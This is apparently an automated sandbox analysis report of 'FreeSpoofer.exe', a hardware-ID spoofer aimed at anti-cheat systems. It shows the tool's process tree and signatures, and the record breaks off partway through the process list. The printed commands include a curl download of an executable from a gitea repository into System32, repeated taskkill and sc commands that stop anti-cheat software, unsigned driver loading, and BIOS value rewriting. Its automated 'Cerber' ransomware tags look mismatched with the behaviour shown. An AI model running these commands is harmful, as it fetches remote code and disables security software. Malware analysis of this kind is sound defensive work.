Analysis
-
max time kernel
42s -
max time network
34s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
03-02-2025 14:37
Behavioral task
behavioral1
Sample
FreeSpoofer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
FreeSpoofer.exe
Resource
win10v2004-20250129-en
General
-
Target
FreeSpoofer.exe
-
Size
3.6MB
-
MD5
d8caeb46f4e99d53b24a27bc62e06551
-
SHA1
6aa211685157b0a76435da5e40dd1c95c018e913
-
SHA256
871ec8bf2237716e219a648c32f24cf8ad584a0f929076aa68dba0abe147b861
-
SHA512
9b9797919fb26fd4a97a20c18a5292015ce3512211c5666487a09d5ab70ae6680be4d1e570bbc95bc47341675a51dad2fd9797be5d4d337421f40ab6fefad3bf
-
SSDEEP
49152:7yWRDINFfPPHf/2sKVJOZqybgQccCRar1TVejyhTmhOoA6DCHoFIx71DuGLt:mWRQf/+ebgQccSaRuE76NKBDuG
Malware Config
Signatures
-
Cerber 41 IoCs
Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.
description ioc pid Process Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe 324 taskkill.exe 3940 taskkill.exe 3956 taskkill.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe 2132 taskkill.exe 1288 taskkill.exe 1228 taskkill.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe 2728 taskkill.exe 4892 taskkill.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe 4504 taskkill.exe 2528 taskkill.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe 1488 taskkill.exe 3128 taskkill.exe 2896 taskkill.exe 4900 taskkill.exe 4852 taskkill.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe 3304 taskkill.exe 4848 taskkill.exe 3044 taskkill.exe 5072 taskkill.exe 2828 taskkill.exe 3832 taskkill.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe 3464 taskkill.exe 4376 taskkill.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe Mutant created AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} CupFixerx32.exe -
Cerber family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FreeSpoofer.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 23 4492 curl.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DyGNggtuuyEOAf\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\DyGNggtuuyEOAf" VXMapperV2.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FreeSpoofer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FreeSpoofer.exe -
Executes dropped EXE 19 IoCs
pid Process 3792 VXMapperV2.exe 1116 CupFixerx32.exe 3180 CupFixerx32.exe 2480 CupFixerx32.exe 2500 CupFixerx32.exe 4032 CupFixerx32.exe 8 CupFixerx32.exe 2980 CupFixerx32.exe 4284 CupFixerx32.exe 920 CupFixerx32.exe 2544 CupFixerx32.exe 1056 CupFixerx32.exe 4580 CupFixerx32.exe 4496 CupFixerx32.exe 4984 CupFixerx32.exe 4848 CupFixerx32.exe 3188 CupFixerx32.exe 2556 CupFixerx32.exe 3908 CupFixerx32.exe -
resource yara_rule behavioral2/memory/1036-0-0x0000000140000000-0x00000001409C9000-memory.dmp themida behavioral2/memory/1036-2-0x0000000140000000-0x00000001409C9000-memory.dmp themida behavioral2/memory/1036-3-0x0000000140000000-0x00000001409C9000-memory.dmp themida behavioral2/memory/1036-4-0x0000000140000000-0x00000001409C9000-memory.dmp themida behavioral2/memory/1036-37-0x0000000140000000-0x00000001409C9000-memory.dmp themida behavioral2/memory/1036-38-0x0000000140000000-0x00000001409C9000-memory.dmp themida behavioral2/memory/1036-39-0x0000000140000000-0x00000001409C9000-memory.dmp themida -
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FreeSpoofer.exe -
Drops file in System32 directory 15 IoCs
description ioc Process File opened for modification C:\Windows\system32\wbem\repository\MAPPING1.MAP svchost.exe File opened for modification C:\Windows\System32\VXMapperV2.exe FreeSpoofer.exe File created C:\Windows\System32\gsoftgmx64.sys FreeSpoofer.exe File opened for modification C:\Windows\system32\wbem\repository svchost.exe File opened for modification C:\Windows\system32\wbem\repository\MAPPING2.MAP svchost.exe File opened for modification C:\Windows\system32\wbem\repository\MAPPING3.MAP svchost.exe File opened for modification C:\Windows\System32\Spoofy.sys FreeSpoofer.exe File created C:\Windows\System32\CupFixerx32.exe FreeSpoofer.exe File opened for modification C:\Windows\System32\CupFixerx32.exe FreeSpoofer.exe File opened for modification C:\Windows\System32\gsoftgmx64.sys FreeSpoofer.exe File opened for modification C:\Windows\system32\wbem\repository\WRITABLE.TST svchost.exe File opened for modification C:\Windows\system32\wbem\repository\OBJECTS.DATA svchost.exe File opened for modification C:\Windows\system32\wbem\repository\INDEX.BTR svchost.exe File created C:\Windows\System32\VXMapperV2.exe curl.exe File created C:\Windows\System32\Spoofy.sys FreeSpoofer.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1036 FreeSpoofer.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2408 sc.exe 4024 sc.exe 2752 sc.exe 4844 sc.exe 4356 sc.exe 3984 sc.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2556 cmd.exe 4724 cmd.exe 5060 cmd.exe 4064 cmd.exe 2988 cmd.exe 1748 cmd.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 3844 ipconfig.exe -
Kills process with taskkill 23 IoCs
pid Process 2896 taskkill.exe 1488 taskkill.exe 3464 taskkill.exe 4852 taskkill.exe 2528 taskkill.exe 3956 taskkill.exe 4848 taskkill.exe 4892 taskkill.exe 5072 taskkill.exe 324 taskkill.exe 3940 taskkill.exe 3044 taskkill.exe 3304 taskkill.exe 1288 taskkill.exe 1228 taskkill.exe 2132 taskkill.exe 4376 taskkill.exe 4900 taskkill.exe 2828 taskkill.exe 2728 taskkill.exe 3832 taskkill.exe 4504 taskkill.exe 3128 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3792 VXMapperV2.exe 3792 VXMapperV2.exe -
Suspicious behavior: LoadsDriver 19 IoCs
pid Process 3792 VXMapperV2.exe 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 324 taskkill.exe Token: SeDebugPrivilege 3940 taskkill.exe Token: SeDebugPrivilege 2828 taskkill.exe Token: SeDebugPrivilege 3044 taskkill.exe Token: SeDebugPrivilege 4852 taskkill.exe Token: SeDebugPrivilege 2528 taskkill.exe Token: SeDebugPrivilege 3956 taskkill.exe Token: SeDebugPrivilege 2728 taskkill.exe Token: SeDebugPrivilege 3304 taskkill.exe Token: SeDebugPrivilege 1228 taskkill.exe Token: SeDebugPrivilege 3832 taskkill.exe Token: SeDebugPrivilege 4848 taskkill.exe Token: SeDebugPrivilege 2132 taskkill.exe Token: SeDebugPrivilege 4892 taskkill.exe Token: SeDebugPrivilege 4504 taskkill.exe Token: SeDebugPrivilege 2896 taskkill.exe Token: SeDebugPrivilege 1488 taskkill.exe Token: SeDebugPrivilege 3128 taskkill.exe Token: SeDebugPrivilege 3464 taskkill.exe Token: SeDebugPrivilege 1288 taskkill.exe Token: SeDebugPrivilege 4900 taskkill.exe Token: SeDebugPrivilege 5072 taskkill.exe Token: SeDebugPrivilege 4376 taskkill.exe Token: SeDebugPrivilege 3792 VXMapperV2.exe Token: SeLoadDriverPrivilege 3792 VXMapperV2.exe Token: SeIncreaseQuotaPrivilege 840 WMIC.exe Token: SeSecurityPrivilege 840 WMIC.exe Token: SeTakeOwnershipPrivilege 840 WMIC.exe Token: SeLoadDriverPrivilege 840 WMIC.exe Token: SeSystemProfilePrivilege 840 WMIC.exe Token: SeSystemtimePrivilege 840 WMIC.exe Token: SeProfSingleProcessPrivilege 840 WMIC.exe Token: SeIncBasePriorityPrivilege 840 WMIC.exe Token: SeCreatePagefilePrivilege 840 WMIC.exe Token: SeBackupPrivilege 840 WMIC.exe Token: SeRestorePrivilege 840 WMIC.exe Token: SeShutdownPrivilege 840 WMIC.exe Token: SeDebugPrivilege 840 WMIC.exe Token: SeSystemEnvironmentPrivilege 840 WMIC.exe Token: SeRemoteShutdownPrivilege 840 WMIC.exe Token: SeUndockPrivilege 840 WMIC.exe Token: SeManageVolumePrivilege 840 WMIC.exe Token: 33 840 WMIC.exe Token: 34 840 WMIC.exe Token: 35 840 WMIC.exe Token: 36 840 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 3020 svchost.exe Token: SeIncreaseQuotaPrivilege 3020 svchost.exe Token: SeSecurityPrivilege 3020 svchost.exe Token: SeTakeOwnershipPrivilege 3020 svchost.exe Token: SeLoadDriverPrivilege 3020 svchost.exe Token: SeSystemtimePrivilege 3020 svchost.exe Token: SeBackupPrivilege 3020 svchost.exe Token: SeRestorePrivilege 3020 svchost.exe Token: SeShutdownPrivilege 3020 svchost.exe Token: SeSystemEnvironmentPrivilege 3020 svchost.exe Token: SeUndockPrivilege 3020 svchost.exe Token: SeManageVolumePrivilege 3020 svchost.exe Token: SeAssignPrimaryTokenPrivilege 3020 svchost.exe Token: SeIncreaseQuotaPrivilege 3020 svchost.exe Token: SeSecurityPrivilege 3020 svchost.exe Token: SeTakeOwnershipPrivilege 3020 svchost.exe Token: SeLoadDriverPrivilege 3020 svchost.exe Token: SeSystemtimePrivilege 3020 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1036 wrote to memory of 4772 1036 FreeSpoofer.exe 86 PID 1036 wrote to memory of 4772 1036 FreeSpoofer.exe 86 PID 1036 wrote to memory of 1960 1036 FreeSpoofer.exe 91 PID 1036 wrote to memory of 1960 1036 FreeSpoofer.exe 91 PID 1036 wrote to memory of 2500 1036 FreeSpoofer.exe 92 PID 1036 wrote to memory of 2500 1036 FreeSpoofer.exe 92 PID 1036 wrote to memory of 4032 1036 FreeSpoofer.exe 93 PID 1036 wrote to memory of 4032 1036 FreeSpoofer.exe 93 PID 4032 wrote to memory of 4492 4032 cmd.exe 94 PID 4032 wrote to memory of 4492 4032 cmd.exe 94 PID 1036 wrote to memory of 460 1036 FreeSpoofer.exe 95 PID 1036 wrote to memory of 460 1036 FreeSpoofer.exe 95 PID 1036 wrote to memory of 5088 1036 FreeSpoofer.exe 96 PID 1036 wrote to memory of 5088 1036 FreeSpoofer.exe 96 PID 5088 wrote to memory of 324 5088 cmd.exe 97 PID 5088 wrote to memory of 324 5088 cmd.exe 97 PID 1036 wrote to memory of 5060 1036 FreeSpoofer.exe 99 PID 1036 wrote to memory of 5060 1036 FreeSpoofer.exe 99 PID 5060 wrote to memory of 3940 5060 cmd.exe 100 PID 5060 wrote to memory of 3940 5060 cmd.exe 100 PID 1036 wrote to memory of 4064 1036 FreeSpoofer.exe 101 PID 1036 wrote to memory of 4064 1036 FreeSpoofer.exe 101 PID 4064 wrote to memory of 2828 4064 cmd.exe 102 PID 4064 wrote to memory of 2828 4064 cmd.exe 102 PID 1036 wrote to memory of 2988 1036 FreeSpoofer.exe 103 PID 1036 wrote to memory of 2988 1036 FreeSpoofer.exe 103 PID 2988 wrote to memory of 3044 2988 cmd.exe 104 PID 2988 wrote to memory of 3044 2988 cmd.exe 104 PID 1036 wrote to memory of 3232 1036 FreeSpoofer.exe 105 PID 1036 wrote to memory of 3232 1036 FreeSpoofer.exe 105 PID 3232 wrote to memory of 4852 3232 cmd.exe 106 PID 3232 wrote to memory of 4852 3232 cmd.exe 106 PID 1036 wrote to memory of 1212 1036 FreeSpoofer.exe 107 PID 1036 wrote to memory of 1212 1036 FreeSpoofer.exe 107 PID 1212 wrote to memory of 2528 1212 cmd.exe 108 PID 1212 wrote to memory of 2528 1212 cmd.exe 108 PID 1036 wrote to memory of 2112 1036 FreeSpoofer.exe 109 PID 1036 wrote to memory of 2112 1036 FreeSpoofer.exe 109 PID 2112 wrote to memory of 3956 2112 cmd.exe 110 PID 2112 wrote to memory of 3956 2112 cmd.exe 110 PID 1036 wrote to memory of 4580 1036 FreeSpoofer.exe 111 PID 1036 wrote to memory of 4580 1036 FreeSpoofer.exe 111 PID 4580 wrote to memory of 2728 4580 cmd.exe 112 PID 4580 wrote to memory of 2728 4580 cmd.exe 112 PID 1036 wrote to memory of 2776 1036 FreeSpoofer.exe 113 PID 1036 wrote to memory of 2776 1036 FreeSpoofer.exe 113 PID 2776 wrote to memory of 3304 2776 cmd.exe 114 PID 2776 wrote to memory of 3304 2776 cmd.exe 114 PID 1036 wrote to memory of 1072 1036 FreeSpoofer.exe 115 PID 1036 wrote to memory of 1072 1036 FreeSpoofer.exe 115 PID 1072 wrote to memory of 1228 1072 cmd.exe 116 PID 1072 wrote to memory of 1228 1072 cmd.exe 116 PID 1036 wrote to memory of 1500 1036 FreeSpoofer.exe 117 PID 1036 wrote to memory of 1500 1036 FreeSpoofer.exe 117 PID 1500 wrote to memory of 3832 1500 cmd.exe 118 PID 1500 wrote to memory of 3832 1500 cmd.exe 118 PID 1036 wrote to memory of 4028 1036 FreeSpoofer.exe 119 PID 1036 wrote to memory of 4028 1036 FreeSpoofer.exe 119 PID 4028 wrote to memory of 4848 4028 cmd.exe 120 PID 4028 wrote to memory of 4848 4028 cmd.exe 120 PID 1036 wrote to memory of 1748 1036 FreeSpoofer.exe 121 PID 1036 wrote to memory of 1748 1036 FreeSpoofer.exe 121 PID 1748 wrote to memory of 2132 1748 cmd.exe 122 PID 1748 wrote to memory of 2132 1748 cmd.exe 122
Processes
-
C:\Users\Admin\AppData\Local\Temp\FreeSpoofer.exe"C:\Users\Admin\AppData\Local\Temp\FreeSpoofer.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:4772
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:1960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent "https://gitea.com/Jaxploit/VuxCheats/raw/branch/main/VXMapperV2.exe" --output C:\\Windows\\System32\\VXMapperV2.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Windows\system32\curl.execurl --silent "https://gitea.com/Jaxploit/VuxCheats/raw/branch/main/VXMapperV2.exe" --output C:\\Windows\\System32\\VXMapperV2.exe3⤵
- Downloads MZ/PE file
- Drops file in System32 directory
PID:4492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im epicgameslauncher.EXE >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im epicgameslauncher.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteClient-Win64-Shipping_EAC.EXE >nul 2>&12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im FortniteClient-Win64-Shipping_EAC.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteClient-Win64-Shipping.EXE >nul 2>&12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im FortniteClient-Win64-Shipping.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteClient-Win64-Shipping_BE.EXE >nul 2>&12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im FortniteClient-Win64-Shipping_BE.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteLauncher.EXE >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im FortniteLauncher.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im UnrealCEFSubProcess.EXE >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im UnrealCEFSubProcess.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im CEFProcess.EXE >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im CEFProcess.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im EasyAntiCheat.EXE >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im EasyAntiCheat.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im BEService.EXE >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im BEService.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im BEServices.EXE >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im BEServices.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im BattleEye.EXE >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im BattleEye.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im epicgameslauncher.EXE >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im epicgameslauncher.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteClient-Win64-Shipping_EAC.EXE >nul 2>&12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im FortniteClient-Win64-Shipping_EAC.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteClient-Win64-Shipping.EXE >nul 2>&12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2556 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im FortniteClient-Win64-Shipping.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteClient-Win64-Shipping_BE.EXE >nul 2>&12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4724 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im FortniteClient-Win64-Shipping_BE.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteLauncher.EXE >nul 2>&12⤵PID:3428
-
C:\Windows\system32\taskkill.exeTASKKILL /f /im FortniteLauncher.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im UnrealCEFSubProcess.EXE >nul 2>&12⤵PID:5000
-
C:\Windows\system32\taskkill.exeTASKKILL /f /im UnrealCEFSubProcess.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im CEFProcess.EXE >nul 2>&12⤵PID:3616
-
C:\Windows\system32\taskkill.exeTASKKILL /f /im CEFProcess.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im EasyAntiCheat.EXE >nul 2>&12⤵PID:4956
-
C:\Windows\system32\taskkill.exeTASKKILL /f /im EasyAntiCheat.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im BEService.EXE >nul 2>&12⤵PID:4208
-
C:\Windows\system32\taskkill.exeTASKKILL /f /im BEService.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im BEServices.EXE >nul 2>&12⤵PID:4312
-
C:\Windows\system32\taskkill.exeTASKKILL /f /im BEServices.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im BattleEye.EXE >nul 2>&12⤵PID:336
-
C:\Windows\system32\taskkill.exeTASKKILL /f /im BattleEye.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c TASKKILL /f /im epicgameslauncher.EXE >nul 2>&12⤵PID:4380
-
C:\Windows\system32\taskkill.exeTASKKILL /f /im epicgameslauncher.EXE3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop BEService >nul 2>&12⤵PID:2740
-
C:\Windows\system32\sc.exesc stop BEService3⤵
- Launches sc.exe
PID:2408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop BEDaisy >nul 2>&12⤵PID:2380
-
C:\Windows\system32\sc.exesc stop BEDaisy3⤵
- Launches sc.exe
PID:4024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop EasyAntiCheat >nul 2>&12⤵PID:2176
-
C:\Windows\system32\sc.exesc stop EasyAntiCheat3⤵
- Launches sc.exe
PID:2752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop EasyAntiCheatSys >nul 2>&12⤵PID:3928
-
C:\Windows\system32\sc.exesc stop EasyAntiCheatSys3⤵
- Launches sc.exe
PID:4844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:4800
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\VXMapperV2.exe C:\Windows\System32\Spoofy.sys2⤵PID:5080
-
C:\Windows\System32\VXMapperV2.exeC:\Windows\System32\VXMapperV2.exe C:\Windows\System32\Spoofy.sys3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:1836
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /IVN "AMI"2⤵PID:740
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /IVN "AMI"3⤵PID:5008
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /IVN "AMI"4⤵
- Cerber
- Executes dropped EXE
PID:1116
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /SP "MacBook Pro 13"2⤵PID:5084
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /SP "MacBook Pro 13"3⤵PID:1324
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /SP "MacBook Pro 13"4⤵
- Cerber
- Executes dropped EXE
PID:3180
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /SV "XPS 15 9570"2⤵PID:4264
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /SV "XPS 15 9570"3⤵PID:1572
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /SV "XPS 15 9570"4⤵
- Cerber
- Executes dropped EXE
PID:2480
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /SS "6BRCQFULLFZ7QKQP"2⤵PID:3104
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /SS "6BRCQFULLFZ7QKQP"3⤵PID:1564
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /SS "6BRCQFULLFZ7QKQP"4⤵
- Cerber
- Executes dropped EXE
PID:2500
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /SU "AUTO"2⤵PID:4904
-
